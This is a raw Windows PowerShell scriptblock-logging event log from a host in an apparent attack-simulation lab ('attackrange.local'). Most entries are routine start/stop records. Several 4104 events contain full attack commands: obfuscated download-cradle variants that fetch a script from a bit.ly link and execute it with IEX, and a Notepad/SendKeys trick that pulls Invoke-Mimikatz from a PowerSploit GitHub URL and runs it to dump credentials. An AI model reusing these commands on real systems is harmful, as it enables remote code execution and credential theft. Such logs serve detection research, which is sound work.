ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469879
Keywords=None
Message=Completed invocation of ScriptBlock ID: a780fe3a-2068-433e-a4d7-8e3d9f205d74
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469904
Keywords=None
Message=Completed invocation of ScriptBlock ID: eae7e9f9-1e19-4bd2-b52d-2e0e5204212a
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469903
Keywords=None
Message=Started invocation of ScriptBlock ID: eae7e9f9-1e19-4bd2-b52d-2e0e5204212a
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469902
Keywords=None
Message=Completed invocation of ScriptBlock ID: fe31aca5-5405-4e0b-ae00-d3b048b34455
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469901
Keywords=None
Message=Started invocation of ScriptBlock ID: fe31aca5-5405-4e0b-ae00-d3b048b34455
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469900
Keywords=None
Message=Started invocation of ScriptBlock ID: 37795985-136e-452f-92eb-9536f7500355
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469899
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))}

ScriptBlock ID: 37795985-136e-452f-92eb-9536f7500355
Path:
06/15/2021 05:01:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469898
Keywords=None
Message=Started invocation of ScriptBlock ID: 4f412f41-fae6-47ac-80b3-1f9de01bbcd3
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469897
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))}

ScriptBlock ID: 4f412f41-fae6-47ac-80b3-1f9de01bbcd3
Path:
06/15/2021 05:01:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1469896
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:01:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1469895
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 6224 in AppDomain: DefaultAppDomain.
06/15/2021 05:01:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1469894
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476078
Keywords=None
Message=Started invocation of ScriptBlock ID: 416a8667-7927-4fd5-90b4-01dd0206b6d7
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476077
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]}

ScriptBlock ID: 416a8667-7927-4fd5-90b4-01dd0206b6d7
Path:
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476076
Keywords=None
Message=Completed invocation of ScriptBlock ID: c1a12072-ec6d-45e8-a8ad-a5d6e031bece
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476075
Keywords=None
Message=Started invocation of ScriptBlock ID: c1a12072-ec6d-45e8-a8ad-a5d6e031bece
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476074
Keywords=None
Message=Completed invocation of ScriptBlock ID: 0ca8316d-5f92-4e9b-944a-432847a17afc
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476073
Keywords=None
Message=Started invocation of ScriptBlock ID: 0ca8316d-5f92-4e9b-944a-432847a17afc
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476072
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8410889f-8037-4eb0-957e-9fcbd2ac3111
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476071
Keywords=None
Message=Started invocation of ScriptBlock ID: 8410889f-8037-4eb0-957e-9fcbd2ac3111
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476070
Keywords=None
Message=Started invocation of ScriptBlock ID: 275f759f-9a7b-4e35-a8de-e1f664abea86
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476069
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr}

ScriptBlock ID: 275f759f-9a7b-4e35-a8de-e1f664abea86
Path:
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476068
Keywords=None
Message=Started invocation of ScriptBlock ID: 23a330c5-a581-49a7-8eb4-594464f9ede6
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476067
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr}

ScriptBlock ID: 23a330c5-a581-49a7-8eb4-594464f9ede6
Path:
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1476066
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1476065
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 5976 in AppDomain: DefaultAppDomain.
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1476064
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476063
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476062
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476061
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476060
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476059
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476058
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476057
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476056
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476055
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476054
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476053
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6dba564e-fad9-41ab-986e-5ea2ddde226a
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476052
Keywords=None
Message=Started invocation of ScriptBlock ID: 6dba564e-fad9-41ab-986e-5ea2ddde226a
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476051
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: 6dba564e-fad9-41ab-986e-5ea2ddde226a
Path:
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476050
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4f412f41-fae6-47ac-80b3-1f9de01bbcd3
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476049
Keywords=None
Message=Completed invocation of ScriptBlock ID: 37795985-136e-452f-92eb-9536f7500355
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476048
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89ebd1bb-8d1f-4a8b-aaa6-51de65f8ffff
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476047
Keywords=None
Message=Started invocation of ScriptBlock ID: 89ebd1bb-8d1f-4a8b-aaa6-51de65f8ffff
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476046
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
